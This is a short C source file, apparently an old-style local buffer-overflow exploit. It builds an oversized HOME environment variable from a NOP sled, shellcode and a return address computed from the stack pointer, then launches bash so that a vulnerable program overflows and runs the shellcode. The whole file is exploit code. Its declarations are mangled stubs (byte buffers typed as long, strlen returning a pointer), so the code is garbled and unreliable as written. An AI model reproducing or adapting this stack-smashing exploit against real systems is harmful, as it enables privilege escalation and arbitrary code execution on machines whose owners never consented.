
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int NOP ;
 unsigned long OFS ;
 unsigned long get_esp () ;
 int printf (char*,long) ;
 int putenv (scalar_t__*) ;
 scalar_t__* s ;
 scalar_t__* s1 ;
 scalar_t__* shellcode ;
 int strcpy (scalar_t__*,char*) ;
 scalar_t__* strlen (scalar_t__*) ;
 int system (char*) ;

int main()
{
 strcpy(s,"HOME=");
 s1=s+5;
 while(s1<s+260+5-strlen(shellcode))
     *(s1++)=NOP;

 while(*shellcode)
            *(s1++)=*(shellcode++);
        *((unsigned long *)s1)=get_esp()-OFS;
 printf("Jump to: %p\n",*((long *)s1));
 s1+=4;
 *s1=0;
 putenv(s);
 system("bash");
}
